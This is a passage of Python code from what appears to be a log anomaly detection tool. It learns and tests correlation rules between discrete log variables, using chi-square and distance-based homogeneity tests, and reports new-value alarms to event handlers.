self.w_rel_ht_results[event_index] = [ [{i_val: [1] * self.num_bt for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]}, { j_val: [1]*self.num_bt for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range( len(self.pos_var_cor[event_index]))] self.w_rel_confidences += [[] for i in range(event_index + 1 - len(self.w_rel_confidences))] self.w_rel_confidences[event_index] = [ [{i_val: [] for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]}, { j_val: [] for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range( len(self.pos_var_cor[event_index]))] # Initialises the appearance list, as a copy of the w_rel_list with 0 instead of the CountIndices current_appearance_list = [ [{i_val: {j_val: 0 for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]} for i_val in self.w_rel_list[ event_index][pos_var_cor_index][0]}, {j_val: {i_val: 0 for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][ j_val]} for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range( len(self.pos_var_cor[event_index]))] # Counting the appearance of the cases in current_appearance_list for k in range(-1, -self.num_update-1, -1): # List of the values of discrete variables, in one log line vals = [self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] for i in range( len(self.discrete_indices[event_index]))] for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): # Count the appearances if the list is not empty or if new rules should be generated if current_appearance_list[pos_var_cor_index] != [{}, {}] or self.generate_rules[event_index]: i = pos_var_cor_val[0] # Index of the first variable in discrete_indices j = pos_var_cor_val[1] # Index of the second variable in discrete_indices # Add the appearance of the line to the appearance list and adds new entries if self.generate_rules[event_index] # is set to True. if vals[i] in current_appearance_list[pos_var_cor_index][0]: if vals[j] in current_appearance_list[pos_var_cor_index][0][vals[i]]: current_appearance_list[pos_var_cor_index][0][vals[i]][vals[j]] += 1 else: current_appearance_list[pos_var_cor_index][0][vals[i]][vals[j]] = 1 elif self.generate_rules[event_index]: current_appearance_list[pos_var_cor_index][0][vals[i]] = {vals[j]: 1} if vals[j] in current_appearance_list[pos_var_cor_index][1]: if vals[i] in current_appearance_list[pos_var_cor_index][1][vals[j]]: current_appearance_list[pos_var_cor_index][1][vals[j]][vals[i]] += 1 else: current_appearance_list[pos_var_cor_index][1][vals[j]][vals[i]] = 1 elif self.generate_rules[event_index]: current_appearance_list[pos_var_cor_index][1][vals[j]] = {vals[i]: 1} if self.generate_rules[event_index]: # generates new rules or appends new values to existing rules for pos_var_cor_index in range(len(self.pos_var_cor[event_index])): # Only consider the possible correlations which have been initialized if current_appearance_list[pos_var_cor_index] != [{}, {}]: # Check correlations i=i_val -> j=j_val and decide if the rules should be deleted, extended or updated, # or if new rules should be generated for i_val in current_appearance_list[pos_var_cor_index][0]: if i_val in self.w_rel_list[event_index][pos_var_cor_index][0]: # Check if new values have appeared, append them and reinitialize the lists tmp_bool = False for j_val in current_appearance_list[pos_var_cor_index][0][i_val]: if j_val not in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: tmp_bool = True break # New values have appeared on the right side if tmp_bool: if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][0][i_val].values(), len(self.pos_var_val[ event_index][j])): # Add new rules self.w_rel_list[event_index][pos_var_cor_index][0][i_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] = sum(current_appearance_list[ pos_var_cor_index][0][i_val].values()) # Add the entries for j_val for j_val in current_appearance_list[pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = current_appearance_list[ pos_var_cor_index][0][i_val][j_val] else: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [0] self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val].append( 0.5 + 1 / len(current_appearance_list[pos_var_cor_index][0][i_val])) self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = self.w_rel_confidences[ event_index][pos_var_cor_index][0][i_val][-(self.num_bt-self.min_successes_bt+1):] if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 0, i_val) del self.w_rel_list[event_index][pos_var_cor_index][0][i_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] # No new values have appeared on the right side. Update the appearance of the relation else: # Check correlations i=i_val -> j=j_val # States True after the following steps if all tests were positive, and False if at least one was negative tmp_bool = True if any(current_appearance_list[pos_var_cor_index][0][i_val][j_val] for j_val in current_appearance_list[ pos_var_cor_index][0][i_val]): tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][0][i_val], current_appearance_list[pos_var_cor_index][0][i_val], event_index, pos_var_cor_index, 0, i_val) # Update the bt_results list if tmp_bool: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [1] for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += current_appearance_list[ pos_var_cor_index][0][i_val][j_val] else: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [0] if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 0, i_val) del self.w_rel_list[event_index][pos_var_cor_index][0][i_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] # i_val not in self.w_rel_list[event_index][pos_var_cor_index][0]. Therefore, test if the rule should be used else: if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][0][i_val].values(), len(self.pos_var_val[ event_index][j])): self.w_rel_list[event_index][pos_var_cor_index][0][i_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] = sum(current_appearance_list[ pos_var_cor_index][0][i_val].values()) self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = [1] * self.num_bt self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = [] # Add the entries for j_val for j_val in current_appearance_list[pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = current_appearance_list[ pos_var_cor_index][0][i_val][j_val] # Check correlations j=j_val -> i=i_val and decide if the rules should be deleted, extended or updated, # or if new rules should be generated. for j_val in current_appearance_list[pos_var_cor_index][1]: if j_val in self.w_rel_list[event_index][pos_var_cor_index][1]: # Check if new values have appeared, append them and reinitialize the lists tmp_bool = False for i_val in current_appearance_list[pos_var_cor_index][1][j_val]: if i_val not in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: tmp_bool = True break # New values have appeared on the right side if tmp_bool: if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][1][j_val].values(), len(self.pos_var_val[ event_index][i])): # Add new rules self.w_rel_list[event_index][pos_var_cor_index][1][j_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] = sum(current_appearance_list[ pos_var_cor_index][1][j_val].values()) # Add the entries for i_val for i_val in current_appearance_list[pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = current_appearance_list[ pos_var_cor_index][1][j_val][i_val] else: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [0] self.w_rel_confidences[event_index][pos_var_cor_index][1][j_val].append( 0.5 + 1 / len(current_appearance_list[pos_var_cor_index][1][j_val])) self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = self.w_rel_confidences[ event_index][pos_var_cor_index][0][i_val][-(self.num_bt-self.min_successes_bt+1):] if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 1, j_val) del self.w_rel_list[event_index][pos_var_cor_index][1][j_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] # No new values have appeared on the right side. Update the appearance of the relation else: # Check correlations i=i_val -> j=j_val # States True after the following steps if all tests were positive, and False if at least one was negative tmp_bool = True if any(current_appearance_list[pos_var_cor_index][1][j_val][i_val] for i_val in current_appearance_list[ pos_var_cor_index][1][j_val]): tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][1][j_val], current_appearance_list[pos_var_cor_index][1][j_val], event_index, pos_var_cor_index, 1, j_val) # Update the bt_results list if tmp_bool: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [1] for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += current_appearance_list[ pos_var_cor_index][1][j_val][i_val] else: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [0] if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 1, j_val) del self.w_rel_list[event_index][pos_var_cor_index][1][j_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] # j_val not in self.w_rel_list[event_index][pos_var_cor_index][1]. Therefore, test if the rule should be used else: if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][1][j_val].values(), len(self.pos_var_val[ event_index][i])): self.w_rel_list[event_index][pos_var_cor_index][1][j_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] = sum(current_appearance_list[ pos_var_cor_index][1][j_val].values()) self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = [1] * self.num_bt self.w_rel_confidences[event_index][pos_var_cor_index][1][j_val] = [] # Add the entries for i_val for i_val in current_appearance_list[pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = current_appearance_list[ pos_var_cor_index][1][j_val][i_val] else: # Tests and updates the correlation rules for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): # Only consider the possible correlations which have been initialized if self.w_rel_list[event_index][pos_var_cor_index] != [{}, {}]: # Initialise the lists for the indices that failed the binomial test failed_i_vals = [] failed_j_vals = [] # Check correlations i=i_val -> j=j_val for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]: # States True after the following steps if all tests were positive, and False if at least one was negative. tmp_bool = True if sum(current_appearance_list[pos_var_cor_index][0][i_val][j_val] for j_val in current_appearance_list[ pos_var_cor_index][0][i_val]) > self.min_values_cors_thres: tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][0][i_val], current_appearance_list[pos_var_cor_index][0][i_val], event_index, pos_var_cor_index, 0, i_val) # Update the bt_results list if tmp_bool: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [1] else: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [0] failed_i_vals.append(i_val) # Check correlations j=j_val -> i=i_val for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]: # States True after the following steps if all tests were positive, and False if at least one was negative tmp_bool = True if sum(current_appearance_list[pos_var_cor_index][1][j_val][i_val] for i_val in current_appearance_list[ pos_var_cor_index][1][j_val]) > self.min_values_cors_thres: tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][1][j_val], current_appearance_list[pos_var_cor_index][1][j_val], event_index, pos_var_cor_index, 1, j_val) # Update the bt_results list if tmp_bool: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [1] else: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [0] failed_j_vals.append(j_val) if self.update_rules[event_index] and self.learn_mode: # Print if new values have appeared in the correlation rules message = f"New values appeared after the {self.event_type_detector.total_records}-th line in correlation(s) of " \ f"the event {self.event_type_detector.get_event_type(event_index)}" confidence = 0 total_correlations = len([None for _ in self.w_rel_list[event_index][pos_var_cor_index][0]]) + len( [None for _ in self.w_rel_list[event_index][pos_var_cor_index][1]]) sorted_log_lines = [] event_data = {"EventIndex": event_index} affected_log_atom_paths = [] distribution_changes = [] for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]: if len(self.w_rel_list[event_index][pos_var_cor_index][0][i_val]) != len(current_appearance_list[ pos_var_cor_index][0][i_val]): if len(current_appearance_list[pos_var_cor_index][0][i_val]) / len(self.w_rel_list[event_index][ pos_var_cor_index][0][i_val]) >= self.new_vals_alarm_thres: sorted_log_lines.append( "Alarm: New value occurred in correlation of the paths %s = %s -> %s =" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(i_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]])) else: sorted_log_lines.append("New value occurred in correlation of the paths %s = %s -> %s =" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(i_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]])) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][pos_var_cor_val[0]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][pos_var_cor_val[1]]]) distribution = { "OldDistribution": [[j_val, self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] / sum( self.w_rel_list[event_index][pos_var_cor_index][0][i_val].values())] for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val].keys()], "NewDistribution": [[j_val, current_appearance_list[pos_var_cor_index][0][i_val][j_val] / sum( current_appearance_list[pos_var_cor_index][0][i_val].values())] for j_val in current_appearance_list[pos_var_cor_index][0][i_val].keys()] } distribution_changes.append(distribution) sorted_log_lines.append(f"Old distribution: {distribution['OldDistribution']}") sorted_log_lines.append(f"New distribution: {distribution['NewDistribution']}") confidence += 1 / total_correlations # Add the new values to the correlation rule for j_val in current_appearance_list[pos_var_cor_index][0][i_val].keys(): if j_val not in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = 0 for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]: if len(self.w_rel_list[event_index][pos_var_cor_index][1][j_val]) != len(current_appearance_list[ pos_var_cor_index][1][j_val]): if len(current_appearance_list[pos_var_cor_index][1][j_val]) / len(self.w_rel_list[event_index][ pos_var_cor_index][1][j_val]) >= self.new_vals_alarm_thres: sorted_log_lines.append("Alarm: New value occurred in correlation of the paths %s = %s -> %s =" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(j_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]])) else: sorted_log_lines.append("New value occurred in correlation of the paths %s = %s -> %s =" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(j_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]])) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][pos_var_cor_val[1]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][pos_var_cor_val[0]]]) distribution = { "OldDistribution": [[i_val, self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] / sum( self.w_rel_list[event_index][pos_var_cor_index][1][j_val].values())] for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][j_val].keys()], "NewDistribution": [[i_val, current_appearance_list[pos_var_cor_index][1][j_val][i_val] / sum( current_appearance_list[pos_var_cor_index][1][j_val].values())] for i_val in current_appearance_list[pos_var_cor_index][1][j_val].keys()] } distribution_changes.append(distribution) sorted_log_lines.append(f"Old distribution: {distribution['OldDistribution']}") sorted_log_lines.append(f"New distribution: {distribution['NewDistribution']}") confidence += 1 / total_correlations # Add the new values to the correlation rule for i_val in current_appearance_list[pos_var_cor_index][1][j_val].keys(): if i_val not in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = 0 if len(sorted_log_lines) != 0: event_data["AffectedLogAtomPaths"] = list(set(affected_log_atom_paths)) event_data["DistributionChanges"] = distribution_changes event_data["TypeInfo"] = {"Confidence": confidence} sorted_log_lines += [""] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event( f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self) # Remove the failed rules if it is an update step # Binomial test and delete rules of the form i=i_val -> j=j_val for i_val in failed_i_vals: if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 0, i_val) del self.w_rel_list[event_index][pos_var_cor_index][0][i_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] # Binomial test and delete rules of the form j=j_val -> i=i_val for j_val in failed_j_vals: if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 1, j_val) del self.w_rel_list[event_index][pos_var_cor_index][1][j_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] # Update the distributions of the correlation rules, which succeeded the test above # Update i=i_val -> j=j_val for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]: if self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val][-1]: for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += current_appearance_list[ pos_var_cor_index][0][i_val][j_val] # Update j=j_val -> i=i_val for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]: if self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val][-1]: for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += current_appearance_list[ pos_var_cor_index][1][j_val][i_val] if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = self.log_atom.atom_time + self.stop_learning_no_anomaly_time else: # Print the rules, which failed the binomial test for i_val in failed_i_vals: if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt: # BT self.print_failed_wrel_test(event_index, pos_var_cor_index, 0, i_val) self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = [1] * self.num_bt self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = [] for j_val in failed_j_vals: if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt: # BT self.print_failed_wrel_test(event_index, pos_var_cor_index, 1, j_val) self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = [1] * self.num_bt self.w_rel_confidences[event_index][pos_var_cor_index][1][j_val] = [] def homogeneity_test(self, occurrences1, occurrences2, event_index, pos_var_cor_index, cor_direction, value1): """Make a two sample test of homogeneity of the given occurrences.""" if self.used_homogeneity_test == "Chi": test_result = 0 for val in occurrences1: if occurrences1[val] > 0: observed1 = occurrences1[val] expected1 = sum(occurrences1.values()) * (occurrences1[val]+occurrences2[val]) / \ (sum(occurrences1.values()) + sum(occurrences2.values())) test_result += (observed1 - expected1) * (observed1 - expected1) / expected1 observed2 = occurrences2[val] expected2 = sum(occurrences2.values()) * (occurrences1[val]+occurrences2[val]) / \ (sum(occurrences1.values()) + sum(occurrences2.values())) test_result += (observed2 - expected2) * (observed2 - expected2) / expected2 quantile = chi2.ppf(1-self.alpha_chisquare_test, (len(occurrences1)-1)) if test_result >= quantile: self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1].append(test_result) self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1] = self.w_rel_confidences[ event_index][pos_var_cor_index][cor_direction][value1][-(self.num_bt-self.min_successes_bt+1):] return False elif self.used_homogeneity_test == "MaxDist": for val in occurrences1: if abs(occurrences1[val] / sum(occurrences1.values()) - occurrences2[val] / max(1, sum(occurrences2.values()))) > self.max_dist_rule_distr: self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1].append(abs( occurrences1[val] / sum(occurrences1.values()) - occurrences2[val] / max( 1, sum(occurrences2.values())))) self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1] = self.w_rel_confidences[ event_index][pos_var_cor_index][cor_direction][value1][-(self.num_bt-self.min_successes_bt+1):] return False return True def pick_cor_match_disc_distr(self, prob_list1, prob_list2): """Check if the the two discrete distribution could have a possible correlation.""" list1 = prob_list1.copy() list2 = prob_list2.copy() list1.sort(reverse=True) list2.sort(reverse=True) for i in range(min(len(list1), len(list2))): if abs(list1[i]-list2[i]) > self.match_disc_distr_threshold/max(len(list1), len(list2)): return False return True def pick_cor_exclude_due_distr(self, prob_list): """Check if the the discrete distribution can be expected to have possible correlation. Returns True for possible correlation and False to be excluded. """ # Assigning epsilon epsilon = self.exclude_due_distr_lower_limit + (1 - self.exclude_due_distr_lower_limit) / len(prob_list) # Check the single probabilities for _, val in enumerate(prob_list): if val > epsilon: return False return True def pick_cor_match_disc_vals(self, val_list1, val_list2): """Check through the values of the two discrete distributions if they could have a possible correlation.""" if len([val for val in val_list1 if val in val_list2]) > self.match_disc_vals_sim_tresh*min( len(val_list1), len(val_list2)): return True return False def pick_cor_random(self, event_index): """Match variables randomly to correlation.""" # List of the generated variable pairs tmp_list = [] # Calculate the number of generated variable pairs if self.percentage_random_cors <= 0.5: # Calculate the number of variable pairs. num_total = self.percentage_random_cors * len(self.discrete_indices[event_index]) * (len( self.discrete_indices[event_index]) - 1) / 2 else: # Calculate the number of variable pairs which are not in the resulting correlations. # Used to reduce the runtime for higher values of percentage_random_cors num_total = (1-self.percentage_random_cors) * len(self.discrete_indices[event_index]) * (len( self.discrete_indices[event_index]) - 1) / 2 if round(num_total % 1., 4) < 0.5 or (round(num_total % 1., 4) == 0.5 and self.percentage_random_cors >= 0.5): num_total = int(num_total) else: num_total = int(num_total+1) # Generate num_total variable pairs while len(tmp_list) < num_total: pos_cor = np.random.randint(0, len(self.discrete_indices[event_index]), [num_total - len(tmp_list), 2]) for _, pos_val in enumerate(pos_cor): if pos_val[0] != pos_val[1] and [min(pos_val[0], pos_val[1]), max(pos_val[0], pos_val[1])] not in tmp_list: tmp_list.append([min(pos_val[0], pos_val[1]), max(pos_val[0], pos_val[1])]) if self.percentage_random_cors <= 0.5: # Return the generated variable pairs return tmp_list # Return all variable pairs, which are not in the generated set return [[i, j] for i in range(len(self.discrete_indices[event_index])) for j in range(i + 1, len(self.discrete_indices[ event_index])) if [i, j] not in tmp_list] def check_cor_w_rel(self, probability_list, total_pos_val): """Check if the probabilities can be considered a possible correlation.""" if (self.check_cor_thres * total_pos_val < len(probability_list)) and ( total_pos_val > self.check_cor_num_thres or max(probability_list) - min(probability_list) < ( self.check_cor_prob_thres * sum(probability_list) / len(probability_list))): return False return True def validate_cor(self): """Validate the found correlations and removes the ones, which fail the requirements.""" for meth in self.used_validate_cor_meth: if meth == "coverVals": self.validate_cor_cover_vals() elif meth == "distinctDistr": self.validate_cor_distinct_distr() def validate_cor_cover_vals(self): """Rate all found relation in regards to their coverage of the values in the first variable. It removes the ones, which have a low rating and therefore can not considered real relations. """ for meth in self.used_cor_meth: if meth == "Rel": for event_index, event_val in enumerate(self.rel_list): for pos_var_cor_index in range(len(self.pos_var_cor[event_index])): # Check if the correlations i=i_val -> j=j_val have a high enough score tmp_sum = sum(sum(event_val[pos_var_cor_index][0][i_val].values()) for i_val in event_val[pos_var_cor_index][0]) if tmp_sum < self.event_type_detector.num_event_lines[event_index]*self.validate_cor_cover_vals_thres: event_val[pos_var_cor_index][0] = {} # Check if the correlations j=j_val -> i=i_val have a high enough score tmp_sum = sum(sum(event_val[pos_var_cor_index][1][j_val].values()) for j_val in event_val[pos_var_cor_index][1]) if tmp_sum < self.event_type_detector.num_event_lines[event_index]*self.validate_cor_cover_vals_thres: event_val[pos_var_cor_index][1] = {} elif meth == "WRel": for event_index, event_val in enumerate(self.w_rel_list): for pos_var_cor_index in range(len(self.pos_var_cor[event_index])): # Check if the correlations i=i_val -> j=j_val have a high enough score tmp_sum = sum(sum(event_val[pos_var_cor_index][0][i_val].values()) for i_val in event_val[pos_var_cor_index][0]) if tmp_sum < self.event_type_detector.num_event_lines[event_index]*self.validate_cor_cover_vals_thres: event_val[pos_var_cor_index][0] = {} # Check if the correlations j=j_val -> i=i_val have a high enough score tmp_sum = sum(sum(event_val[pos_var_cor_index][1][j_val].values()) for j_val in event_val[pos_var_cor_index][1]) if tmp_sum < self.event_type_detector.num_event_lines[event_index]*self.validate_cor_cover_vals_thres: event_val[pos_var_cor_index][1] = {} def validate_cor_distinct_distr(self): """Compare the right hand sides of the found relations. It removes the correlations, which are too similar to the distribution of the variable type. """ for meth in self.used_cor_meth: if meth == "WRel": for event_index, event_val in enumerate(self.w_rel_list): for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): # Check if the correlations i=i_val -> j=j_val are distinct enough to be considered independent # List in which the distributions of the single corrs are saved. distribution_list = [[] for _ in range(len(self.pos_var_val[event_index][pos_var_cor_val[1]]))] # The probabilities can be read out with: distribution_list[j_val][i_val] frequency_list = [] # List which stores the appearance of the single correlations for i_val in event_val[pos_var_cor_index][0]: if sum(event_val[pos_var_cor_index][0][i_val].values()) > self.min_values_cors_thres: # Calculates the distribution and appends it to distribution_list frequency_list.append(sum(event_val[pos_var_cor_index][0][i_val].values())) for k, k_val in enumerate(self.pos_var_val[event_index][pos_var_cor_val[1]]): if k_val in event_val[pos_var_cor_index][0][i_val]: distribution_list[k].append(event_val[pos_var_cor_index][0][i_val][k_val] / frequency_list[-1]) else: distribution_list[k].append(0) # Number of total appearances total_frequency = max(1, sum(frequency_list)) # Mean of the distributions mean_list = [sum(distribution_list[i][j]*frequency_list[j] for j in range(len(frequency_list)))/total_frequency for i in range(len(self.pos_var_val[event_index][pos_var_cor_val[1]]))] # Variance of the correlations variance_list = [0 for _ in range(len(self.pos_var_val[event_index][pos_var_cor_val[1]]))] # Calculate the variance of the single values for i in range(len(self.pos_var_val[event_index][pos_var_cor_val[1]])): variance_list[i] = sum((distribution_list[i][j] - mean_list[i])**2 * frequency_list[j] / total_frequency for j in range(len(frequency_list))) # Check if the variance exceeds the threshold if sum(variance_list) < self.validate_cor_distinct_thres: event_val[pos_var_cor_index][0] = {} # Check if the correlations j=j_val -> i=i_val are distinct enough to be considered independent # List in which the distributions of the single corrs are saved. distribution_list = [[] for _ in range(len(self.pos_var_val[event_index][pos_var_cor_val[0]]))] # The probabilities can be read out with: distribution_list[i_val][j_val] frequency_list = [] # List which stores the appearance of the single correlations for j_val in event_val[pos_var_cor_index][1]: if sum(event_val[pos_var_cor_index][1][j_val].values()) > self.min_values_cors_thres: # Calculates the distribution and appends it to distribution_list frequency_list.append(sum(event_val[pos_var_cor_index][1][j_val].values())) for k, k_val in enumerate(self.pos_var_val[event_index][pos_var_cor_val[0]]): if k_val in event_val[pos_var_cor_index][1][j_val]: distribution_list[k].append( event_val[pos_var_cor_index][1][j_val][k_val] / frequency_list[-1]) else: distribution_list[k].append(0) # Number of total appearances total_frequency = max(1, sum(frequency_list)) # Mean of the distributions mean_list = [sum(distribution_list[i][j]*frequency_list[j] for j in range(len(frequency_list)))/total_frequency for i in range(len(self.pos_var_val[event_index][pos_var_cor_val[0]]))] # Variance of the correlations variance_list = [0 for _ in range(len(self.pos_var_val[event_index][pos_var_cor_val[0]]))] # Calculate the variance of the single values for i in range(len(self.pos_var_val[event_index][pos_var_cor_val[0]])): variance_list[i] = sum((distribution_list[i][j] - mean_list[i])**2 * frequency_list[j] / total_frequency for j in range(len(frequency_list))) # Check if the variance exceeds the threshold if sum(variance_list) < self.validate_cor_distinct_thres: event_val[pos_var_cor_index][1] = {} def print_ini_rel(self, event_index): """Print the generated correlations for the method "relations".""" message = f"Initialisation of the method relations of the event {self.event_type_detector.get_event_type(event_index)}" message += "\n%s rules have been generated for this event type" % ( sum(len(self.rel_list[event_index][pos_var_cor_index][0]) for pos_var_cor_index in range(len( self.rel_list[event_index])) if self.rel_list[event_index][pos_var_cor_index] != [{}, {}]) + sum(len( self.rel_list[event_index][pos_var_cor_index][1]) for pos_var_cor_index in range(len(self.rel_list[event_index])) if self.rel_list[event_index][pos_var_cor_index] != [{}, {}])) sorted_log_lines = [] event_data = {"EventIndex": event_index} affected_log_atom_paths = [] affected_log_atom_values = [] for pos_var_cor_index, pos_var_cor_val in enumerate(self.rel_list[event_index]): if pos_var_cor_val != [{}, {}]: i = self.pos_var_cor[event_index][pos_var_cor_index][0] j = self.pos_var_cor[event_index][pos_var_cor_index][1] for i_val in pos_var_cor_val[0]: # Var i=i_val -> Var j=j_val if len(pos_var_cor_val[0][i_val]) > 0 and sum(pos_var_cor_val[0][i_val].values()) > self.min_values_cors_thres: sorted_log_lines.append("x) VarPath %s = %s" % ( 